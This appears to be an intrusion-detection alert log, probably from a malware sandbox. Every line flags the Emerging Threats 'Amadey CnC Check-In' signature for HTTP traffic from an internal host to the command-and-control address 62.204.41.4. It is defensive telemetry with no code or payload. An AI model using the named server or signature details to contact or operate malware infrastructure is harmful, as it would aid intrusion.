192.168.2.562.204.41.450105802027700 02/07/23-19:58:55.457749	TCP	2027700	ET TROJAN Amadey CnC Check-In	50105	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449700802027700 02/07/23-19:57:04.269931	TCP	2027700	ET TROJAN Amadey CnC Check-In	49700	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449856802027700 02/07/23-19:57:48.633799	TCP	2027700	ET TROJAN Amadey CnC Check-In	49856	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450429802027700 02/07/23-20:00:25.500722	TCP	2027700	ET TROJAN Amadey CnC Check-In	50429	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449833802027700 02/07/23-19:57:39.543463	TCP	2027700	ET TROJAN Amadey CnC Check-In	49833	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450297802027700 02/07/23-19:59:49.266256	TCP	2027700	ET TROJAN Amadey CnC Check-In	50297	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450452802027700 02/07/23-20:00:31.039414	TCP	2027700	ET TROJAN Amadey CnC Check-In	50452	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450334802027700 02/07/23-19:59:58.221791	TCP	2027700	ET TROJAN Amadey CnC Check-In	50334	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449874802027700 02/07/23-19:57:52.779348	TCP	2027700	ET TROJAN Amadey CnC Check-In	49874	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449894802027700 02/07/23-19:57:57.677143	TCP	2027700	ET TROJAN Amadey CnC Check-In	49894	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449911802027700 02/07/23-19:58:01.794028	TCP	2027700	ET TROJAN Amadey CnC Check-In	49911	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450274802027700 02/07/23-19:59:42.509237	TCP	2027700	ET TROJAN Amadey CnC Check-In	50274	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450256802027700 02/07/23-19:59:37.251534	TCP	2027700	ET TROJAN Amadey CnC Check-In	50256	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450078802027700 02/07/23-19:58:48.869935	TCP	2027700	ET TROJAN Amadey CnC Check-In	50078	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449715802027700 02/07/23-19:57:10.319689	TCP	2027700	ET TROJAN Amadey CnC Check-In	49715	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449733802027700 02/07/23-19:57:13.945819	TCP	2027700	ET TROJAN Amadey CnC Check-In	49733	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450096802027700 02/07/23-19:58:53.262318	TCP	2027700	ET TROJAN Amadey CnC Check-In	50096	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450352802027700 02/07/23-20:00:04.891222	TCP	2027700	ET TROJAN Amadey CnC Check-In	50352	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450156802027700 02/07/23-19:59:10.481824	TCP	2027700	ET TROJAN Amadey CnC Check-In	50156	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450228802027700 02/07/23-19:59:30.531227	TCP	2027700	ET TROJAN Amadey CnC Check-In	50228	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449805802027700 02/07/23-19:57:32.928581	TCP	2027700	ET TROJAN Amadey CnC Check-In	49805	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450447802027700 02/07/23-20:00:29.817138	TCP	2027700	ET TROJAN Amadey CnC Check-In	50447	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450406802027700 02/07/23-20:00:17.910532	TCP	2027700	ET TROJAN Amadey CnC Check-In	50406	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449710802027700 02/07/23-19:57:09.099241	TCP	2027700	ET TROJAN Amadey CnC Check-In	49710	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450115802027700 02/07/23-19:58:57.838937	TCP	2027700	ET TROJAN Amadey CnC Check-In	50115	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450311802027700 02/07/23-19:59:52.679367	TCP	2027700	ET TROJAN Amadey CnC Check-In	50311	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450133802027700 02/07/23-19:59:03.417426	TCP	2027700	ET TROJAN Amadey CnC Check-In	50133	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450174802027700 02/07/23-19:59:14.839891	TCP	2027700	ET TROJAN Amadey CnC Check-In	50174	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449828802027700 02/07/23-19:57:38.323716	TCP	2027700	ET TROJAN Amadey CnC Check-In	49828	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450027802027700 02/07/23-19:58:34.302753	TCP	2027700	ET TROJAN Amadey CnC Check-In	50027	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450284802027700 02/07/23-19:59:46.139610	TCP	2027700	ET TROJAN Amadey CnC Check-In	50284	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449846802027700 02/07/23-19:57:42.696965	TCP	2027700	ET TROJAN Amadey CnC Check-In	49846	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450462802027700 02/07/23-20:00:33.222235	TCP	2027700	ET TROJAN Amadey CnC Check-In	50462	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450205802027700 02/07/23-19:59:23.312322	TCP	2027700	ET TROJAN Amadey CnC Check-In	50205	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449705802027700 02/07/23-19:57:06.909903	TCP	2027700	ET TROJAN Amadey CnC Check-In	49705	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450321802027700 02/07/23-19:59:55.064377	TCP	2027700	ET TROJAN Amadey CnC Check-In	50321	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449962802027700 02/07/23-19:58:16.087938	TCP	2027700	ET TROJAN Amadey CnC Check-In	49962	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449990802027700 02/07/23-19:58:22.962299	TCP	2027700	ET TROJAN Amadey CnC Check-In	49990	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450113802027700 02/07/23-19:58:57.370709	TCP	2027700	ET TROJAN Amadey CnC Check-In	50113	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450465802027700 02/07/23-20:00:33.942201	TCP	2027700	ET TROJAN Amadey CnC Check-In	50465	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450287802027700 02/07/23-19:59:46.895270	TCP	2027700	ET TROJAN Amadey CnC Check-In	50287	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449702802027700 02/07/23-19:57:05.106586	TCP	2027700	ET TROJAN Amadey CnC Check-In	49702	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449730802027700 02/07/23-19:57:13.243832	TCP	2027700	ET TROJAN Amadey CnC Check-In	49730	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449876802027700 02/07/23-19:57:53.245417	TCP	2027700	ET TROJAN Amadey CnC Check-In	49876	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450143802027700 02/07/23-19:59:07.357882	TCP	2027700	ET TROJAN Amadey CnC Check-In	50143	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449818802027700 02/07/23-19:57:36.123767	TCP	2027700	ET TROJAN Amadey CnC Check-In	49818	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450146802027700 02/07/23-19:59:08.058254	TCP	2027700	ET TROJAN Amadey CnC Check-In	50146	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450437802027700 02/07/23-20:00:27.438497	TCP	2027700	ET TROJAN Amadey CnC Check-In	50437	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450434802027700 02/07/23-20:00:26.717538	TCP	2027700	ET TROJAN Amadey CnC Check-In	50434	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450324802027700 02/07/23-19:59:55.796737	TCP	2027700	ET TROJAN Amadey CnC Check-In	50324	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449989802027700 02/07/23-19:58:22.562862	TCP	2027700	ET TROJAN Amadey CnC Check-In	49989	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449871802027700 02/07/23-19:57:52.296229	TCP	2027700	ET TROJAN Amadey CnC Check-In	49871	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449897802027700 02/07/23-19:57:58.416673	TCP	2027700	ET TROJAN Amadey CnC Check-In	49897	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449815802027700 02/07/23-19:57:35.404124	TCP	2027700	ET TROJAN Amadey CnC Check-In	49815	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450426802027700 02/07/23-20:00:24.801297	TCP	2027700	ET TROJAN Amadey CnC Check-In	50426	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450100802027700 02/07/23-19:58:54.228469	TCP	2027700	ET TROJAN Amadey CnC Check-In	50100	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449807802027700 02/07/23-19:57:33.429668	TCP	2027700	ET TROJAN Amadey CnC Check-In	49807	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450098802027700 02/07/23-19:58:53.748513	TCP	2027700	ET TROJAN Amadey CnC Check-In	50098	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450360802027700 02/07/23-20:00:06.784027	TCP	2027700	ET TROJAN Amadey CnC Check-In	50360	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450409802027700 02/07/23-20:00:18.614092	TCP	2027700	ET TROJAN Amadey CnC Check-In	50409	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449848802027700 02/07/23-19:57:43.671762	TCP	2027700	ET TROJAN Amadey CnC Check-In	49848	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450141802027700 02/07/23-19:59:06.885723	TCP	2027700	ET TROJAN Amadey CnC Check-In	50141	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449784802027700 02/07/23-19:57:27.871680	TCP	2027700	ET TROJAN Amadey CnC Check-In	49784	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450182802027700 02/07/23-19:59:16.745810	TCP	2027700	ET TROJAN Amadey CnC Check-In	50182	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450218802027700 02/07/23-19:59:28.144912	TCP	2027700	ET TROJAN Amadey CnC Check-In	50218	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450259802027700 02/07/23-19:59:37.982209	TCP	2027700	ET TROJAN Amadey CnC Check-In	50259	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450389802027700 02/07/23-20:00:13.814637	TCP	2027700	ET TROJAN Amadey CnC Check-In	50389	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450289802027700 02/07/23-19:59:47.359030	TCP	2027700	ET TROJAN Amadey CnC Check-In	50289	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450000802027700 02/07/23-19:58:27.513822	TCP	2027700	ET TROJAN Amadey CnC Check-In	50000	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449889802027700 02/07/23-19:57:56.483664	TCP	2027700	ET TROJAN Amadey CnC Check-In	49889	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449713802027700 02/07/23-19:57:09.809088	TCP	2027700	ET TROJAN Amadey CnC Check-In	49713	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450041802027700 02/07/23-19:58:37.467492	TCP	2027700	ET TROJAN Amadey CnC Check-In	50041	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450118802027700 02/07/23-19:58:58.558092	TCP	2027700	ET TROJAN Amadey CnC Check-In	50118	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450171802027700 02/07/23-19:59:14.125363	TCP	2027700	ET TROJAN Amadey CnC Check-In	50171	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450467802027700 02/07/23-20:00:34.410744	TCP	2027700	ET TROJAN Amadey CnC Check-In	50467	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449843802027700 02/07/23-19:57:41.966115	TCP	2027700	ET TROJAN Amadey CnC Check-In	49843	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449884802027700 02/07/23-19:57:55.199529	TCP	2027700	ET TROJAN Amadey CnC Check-In	49884	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450248802027700 02/07/23-19:59:35.309770	TCP	2027700	ET TROJAN Amadey CnC Check-In	50248	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449881802027700 02/07/23-19:57:54.464877	TCP	2027700	ET TROJAN Amadey CnC Check-In	49881	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450154802027700 02/07/23-19:59:10.010091	TCP	2027700	ET TROJAN Amadey CnC Check-In	50154	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450243802027700 02/07/23-19:59:34.125339	TCP	2027700	ET TROJAN Amadey CnC Check-In	50243	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449970802027700 02/07/23-19:58:17.986268	TCP	2027700	ET TROJAN Amadey CnC Check-In	49970	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450332802027700 02/07/23-19:59:57.750216	TCP	2027700	ET TROJAN Amadey CnC Check-In	50332	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449774802027700 02/07/23-19:57:22.791511	TCP	2027700	ET TROJAN Amadey CnC Check-In	49774	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450047802027700 02/07/23-19:58:38.899810	TCP	2027700	ET TROJAN Amadey CnC Check-In	50047	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450399802027700 02/07/23-20:00:16.236683	TCP	2027700	ET TROJAN Amadey CnC Check-In	50399	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449835802027700 02/07/23-19:57:40.026952	TCP	2027700	ET TROJAN Amadey CnC Check-In	49835	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449924802027700 02/07/23-19:58:07.066105	TCP	2027700	ET TROJAN Amadey CnC Check-In	49924	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450065802027700 02/07/23-19:58:45.626874	TCP	2027700	ET TROJAN Amadey CnC Check-In	50065	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450019802027700 02/07/23-19:58:32.292789	TCP	2027700	ET TROJAN Amadey CnC Check-In	50019	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450365802027700 02/07/23-20:00:08.016119	TCP	2027700	ET TROJAN Amadey CnC Check-In	50365	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450215802027700 02/07/23-19:59:27.402726	TCP	2027700	ET TROJAN Amadey CnC Check-In	50215	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449746802027700 02/07/23-19:57:17.135800	TCP	2027700	ET TROJAN Amadey CnC Check-In	49746	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449942802027700 02/07/23-19:58:11.343155	TCP	2027700	ET TROJAN Amadey CnC Check-In	49942	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450108802027700 02/07/23-19:58:56.182131	TCP	2027700	ET TROJAN Amadey CnC Check-In	50108	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450304802027700 02/07/23-19:59:50.968034	TCP	2027700	ET TROJAN Amadey CnC Check-In	50304	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450187802027700 02/07/23-19:59:17.949465	TCP	2027700	ET TROJAN Amadey CnC Check-In	50187	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449853802027700 02/07/23-19:57:47.844021	TCP	2027700	ET TROJAN Amadey CnC Check-In	49853	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450454802027700 02/07/23-20:00:31.504096	TCP	2027700	ET TROJAN Amadey CnC Check-In	50454	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449764802027700 02/07/23-19:57:20.603429	TCP	2027700	ET TROJAN Amadey CnC Check-In	49764	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450031802027700 02/07/23-19:58:35.304361	TCP	2027700	ET TROJAN Amadey CnC Check-In	50031	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450383802027700 02/07/23-20:00:12.387972	TCP	2027700	ET TROJAN Amadey CnC Check-In	50383	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450120802027700 02/07/23-19:58:59.032260	TCP	2027700	ET TROJAN Amadey CnC Check-In	50120	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450276802027700 02/07/23-19:59:43.973222	TCP	2027700	ET TROJAN Amadey CnC Check-In	50276	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450126802027700 02/07/23-19:59:00.503245	TCP	2027700	ET TROJAN Amadey CnC Check-In	50126	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449952802027700 02/07/23-19:58:13.723295	TCP	2027700	ET TROJAN Amadey CnC Check-In	49952	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450037802027700 02/07/23-19:58:36.516957	TCP	2027700	ET TROJAN Amadey CnC Check-In	50037	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449958802027700 02/07/23-19:58:15.137846	TCP	2027700	ET TROJAN Amadey CnC Check-In	49958	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450003802027700 02/07/23-19:58:28.269253	TCP	2027700	ET TROJAN Amadey CnC Check-In	50003	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449863802027700 02/07/23-19:57:50.367777	TCP	2027700	ET TROJAN Amadey CnC Check-In	49863	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450192802027700 02/07/23-19:59:19.202750	TCP	2027700	ET TROJAN Amadey CnC Check-In	50192	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450393802027700 02/07/23-20:00:14.802337	TCP	2027700	ET TROJAN Amadey CnC Check-In	50393	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449792802027700 02/07/23-19:57:29.791091	TCP	2027700	ET TROJAN Amadey CnC Check-In	49792	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449869802027700 02/07/23-19:57:51.811174	TCP	2027700	ET TROJAN Amadey CnC Check-In	49869	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449999802027700 02/07/23-19:58:27.278096	TCP	2027700	ET TROJAN Amadey CnC Check-In	49999	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450088802027700 02/07/23-19:58:51.281257	TCP	2027700	ET TROJAN Amadey CnC Check-In	50088	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450370802027700 02/07/23-20:00:09.189137	TCP	2027700	ET TROJAN Amadey CnC Check-In	50370	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450281802027700 02/07/23-19:59:45.414960	TCP	2027700	ET TROJAN Amadey CnC Check-In	50281	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450110802027700 02/07/23-19:58:56.657477	TCP	2027700	ET TROJAN Amadey CnC Check-In	50110	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450021802027700 02/07/23-19:58:32.794730	TCP	2027700	ET TROJAN Amadey CnC Check-In	50021	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450177802027700 02/07/23-19:59:15.563617	TCP	2027700	ET TROJAN Amadey CnC Check-In	50177	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450419802027700 02/07/23-20:00:23.118934	TCP	2027700	ET TROJAN Amadey CnC Check-In	50419	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450269802027700 02/07/23-19:59:40.413543	TCP	2027700	ET TROJAN Amadey CnC Check-In	50269	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449993802027700 02/07/23-19:58:24.614337	TCP	2027700	ET TROJAN Amadey CnC Check-In	49993	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450009802027700 02/07/23-19:58:29.797002	TCP	2027700	ET TROJAN Amadey CnC Check-In	50009	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449812802027700 02/07/23-19:57:34.636727	TCP	2027700	ET TROJAN Amadey CnC Check-In	49812	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449879802027700 02/07/23-19:57:53.960321	TCP	2027700	ET TROJAN Amadey CnC Check-In	49879	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449720802027700 02/07/23-19:57:10.789751	TCP	2027700	ET TROJAN Amadey CnC Check-In	49720	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449723802027700 02/07/23-19:57:11.507306	TCP	2027700	ET TROJAN Amadey CnC Check-In	49723	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449968802027700 02/07/23-19:58:17.511977	TCP	2027700	ET TROJAN Amadey CnC Check-In	49968	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449901802027700 02/07/23-19:57:59.369719	TCP	2027700	ET TROJAN Amadey CnC Check-In	49901	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450238802027700 02/07/23-19:59:32.939539	TCP	2027700	ET TROJAN Amadey CnC Check-In	50238	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450149802027700 02/07/23-19:59:08.801458	TCP	2027700	ET TROJAN Amadey CnC Check-In	50149	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449708802027700 02/07/23-19:57:08.619164	TCP	2027700	ET TROJAN Amadey CnC Check-In	49708	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450250802027700 02/07/23-19:59:35.782201	TCP	2027700	ET TROJAN Amadey CnC Check-In	50250	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450253802027700 02/07/23-19:59:36.518712	TCP	2027700	ET TROJAN Amadey CnC Check-In	50253	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450327802027700 02/07/23-19:59:56.530972	TCP	2027700	ET TROJAN Amadey CnC Check-In	50327	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450416802027700 02/07/23-20:00:22.006473	TCP	2027700	ET TROJAN Amadey CnC Check-In	50416	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450342802027700 02/07/23-20:00:00.462429	TCP	2027700	ET TROJAN Amadey CnC Check-In	50342	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450161802027700 02/07/23-19:59:11.700306	TCP	2027700	ET TROJAN Amadey CnC Check-In	50161	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450431802027700 02/07/23-20:00:25.972242	TCP	2027700	ET TROJAN Amadey CnC Check-In	50431	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450291802027700 02/07/23-19:59:47.841889	TCP	2027700	ET TROJAN Amadey CnC Check-In	50291	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450294802027700 02/07/23-19:59:48.563161	TCP	2027700	ET TROJAN Amadey CnC Check-In	50294	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449891802027700 02/07/23-19:57:56.954067	TCP	2027700	ET TROJAN Amadey CnC Check-In	49891	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450075802027700 02/07/23-19:58:48.119366	TCP	2027700	ET TROJAN Amadey CnC Check-In	50075	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450164802027700 02/07/23-19:59:12.434295	TCP	2027700	ET TROJAN Amadey CnC Check-In	50164	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449914802027700 02/07/23-19:58:02.515565	TCP	2027700	ET TROJAN Amadey CnC Check-In	49914	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449980802027700 02/07/23-19:58:20.421307	TCP	2027700	ET TROJAN Amadey CnC Check-In	49980	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449850802027700 02/07/23-19:57:44.320306	TCP	2027700	ET TROJAN Amadey CnC Check-In	49850	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450225802027700 02/07/23-19:59:29.829004	TCP	2027700	ET TROJAN Amadey CnC Check-In	50225	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450355802027700 02/07/23-20:00:05.610275	TCP	2027700	ET TROJAN Amadey CnC Check-In	50355	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449736802027700 02/07/23-19:57:14.683730	TCP	2027700	ET TROJAN Amadey CnC Check-In	49736	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449866802027700 02/07/23-19:57:51.087084	TCP	2027700	ET TROJAN Amadey CnC Check-In	49866	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449825802027700 02/07/23-19:57:37.561460	TCP	2027700	ET TROJAN Amadey CnC Check-In	49825	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449996802027700 02/07/23-19:58:26.579679	TCP	2027700	ET TROJAN Amadey CnC Check-In	49996	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450006802027700 02/07/23-19:58:29.008274	TCP	2027700	ET TROJAN Amadey CnC Check-In	50006	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449955802027700 02/07/23-19:58:14.419186	TCP	2027700	ET TROJAN Amadey CnC Check-In	49955	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450136802027700 02/07/23-19:59:05.899724	TCP	2027700	ET TROJAN Amadey CnC Check-In	50136	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449777802027700 02/07/23-19:57:23.720957	TCP	2027700	ET TROJAN Amadey CnC Check-In	49777	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450266802027700 02/07/23-19:59:39.687644	TCP	2027700	ET TROJAN Amadey CnC Check-In	50266	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450396802027700 02/07/23-20:00:15.510798	TCP	2027700	ET TROJAN Amadey CnC Check-In	50396	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450314802027700 02/07/23-19:59:53.406803	TCP	2027700	ET TROJAN Amadey CnC Check-In	50314	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450444802027700 02/07/23-20:00:29.095831	TCP	2027700	ET TROJAN Amadey CnC Check-In	50444	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450403802027700 02/07/23-20:00:17.175192	TCP	2027700	ET TROJAN Amadey CnC Check-In	50403	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450059802027700 02/07/23-19:58:41.853764	TCP	2027700	ET TROJAN Amadey CnC Check-In	50059	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450157802027700 02/07/23-19:59:10.761628	TCP	2027700	ET TROJAN Amadey CnC Check-In	50157	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450062802027700 02/07/23-19:58:42.938578	TCP	2027700	ET TROJAN Amadey CnC Check-In	50062	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449829802027700 02/07/23-19:57:38.585640	TCP	2027700	ET TROJAN Amadey CnC Check-In	49829	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449927802027700 02/07/23-19:58:07.969609	TCP	2027700	ET TROJAN Amadey CnC Check-In	49927	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449832802027700 02/07/23-19:57:39.308335	TCP	2027700	ET TROJAN Amadey CnC Check-In	49832	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450160802027700 02/07/23-19:59:11.468507	TCP	2027700	ET TROJAN Amadey CnC Check-In	50160	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449734802027700 02/07/23-19:57:14.182238	TCP	2027700	ET TROJAN Amadey CnC Check-In	49734	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450451802027700 02/07/23-20:00:30.804845	TCP	2027700	ET TROJAN Amadey CnC Check-In	50451	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450001802027700 02/07/23-19:58:27.747122	TCP	2027700	ET TROJAN Amadey CnC Check-In	50001	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450255802027700 02/07/23-19:59:37.003438	TCP	2027700	ET TROJAN Amadey CnC Check-In	50255	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450353802027700 02/07/23-20:00:05.126188	TCP	2027700	ET TROJAN Amadey CnC Check-In	50353	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449930802027700 02/07/23-19:58:08.681863	TCP	2027700	ET TROJAN Amadey CnC Check-In	49930	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449988802027700 02/07/23-19:58:22.324290	TCP	2027700	ET TROJAN Amadey CnC Check-In	49988	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449762802027700 02/07/23-19:57:20.088453	TCP	2027700	ET TROJAN Amadey CnC Check-In	49762	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450090802027700 02/07/23-19:58:51.779336	TCP	2027700	ET TROJAN Amadey CnC Check-In	50090	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449860802027700 02/07/23-19:57:49.596112	TCP	2027700	ET TROJAN Amadey CnC Check-In	49860	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450095802027700 02/07/23-19:58:53.020938	TCP	2027700	ET TROJAN Amadey CnC Check-In	50095	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450448802027700 02/07/23-20:00:30.077914	TCP	2027700	ET TROJAN Amadey CnC Check-In	50448	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.449963802027700 02/07/23-19:58:16.325115	TCP	2027700	ET TROJAN Amadey CnC Check-In	49963	80	192.168.2.5	62.204.41.4
192.168.2.562.204.41.450423802027700 02/07/23-20:00:24.067700	TCP	2027700	ET TROJAN Amadey CnC Check-In	50423	80	192.168.2.5	62.204.41.4
